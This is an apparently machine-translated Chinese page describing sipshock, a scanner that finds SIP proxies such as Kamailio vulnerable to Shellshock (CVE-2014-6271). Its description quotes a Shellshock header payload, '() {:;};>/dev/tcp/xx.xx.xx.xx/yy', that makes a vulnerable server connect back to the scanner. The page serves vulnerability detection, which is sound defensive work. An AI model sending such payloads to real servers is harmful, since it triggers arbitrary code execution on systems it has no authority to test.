帮酷LOGO
  • 显示原文与译文双语对照的内容
文章标签:Shell  Proxies  SIP  SCA  
A scanner for SIP proxies vulnerable to Shellshock

  • 源代码名称:sipshock
  • 源代码网址:http://www.github.com/zaf/sipshock
  • sipshock源代码文档
  • sipshock源代码下载
  • Git URL:
    git://www.github.com/zaf/sipshock.git
  • Git Clone代码到本地:
    git clone http://www.github.com/zaf/sipshock
  • Subversion代码到本地:
    $ svn co --depth empty http://www.github.com/zaf/sipshock
    Checked out revision 1.
    $ cd repo
    $ svn up trunk
  • 用于SIP代理的扫描程序易受Shellshock攻击

    用法:

    sipshock [ Flags ] [ IP Addresses ]

    用户定义的用法标志:
    • lhost: 本地监听地址
    • lport: 本地侦听端口( 默认 10111 )
    • rport: 远程端口( 默认 5060 )

    Kamailio中的exec MODULE 。和propably其他服务 fork 将接收到的SIP头部作为 环境变量 传递给调用的shell 。 这使得这些SIP代理容易受到 CVE-2014-6271 ( Bash Shellshock )的攻击。 如果代理正在使用任何 on,并且将'setVars'参数设置为默认值'1',则通过发送特殊标头的SIP消息运行任意代码。

    Sipshock尝试通过发送包含以下标头的SIP INVITE消息来检测此类脆弱的代理: "x ploit: ( ) {: ;} ;>/dev/tcp/xx.xx.xx.xx/yy",xx.xx. xx 。xx/篓是sipshock侦听的本地IP和端口。 脆弱的服务器将调用 shell 来执行上面的代码,并打开到 xx.xx. xx的tcp连接:yy 。 Sipshock检测到连接并将服务器列出为易受攻击的。

    本程序是免费软件,以GNU通用 public 许可证版本 3的条款发布。 查看源代码树顶部的许可证文件。



    文章标签:SCA  Shell  Proxies  SIP  

    Copyright © 2011 HelpLib All rights reserved.    知识分享协议 京ICP备05059198号-3  |  如果智培  |  酷兔英语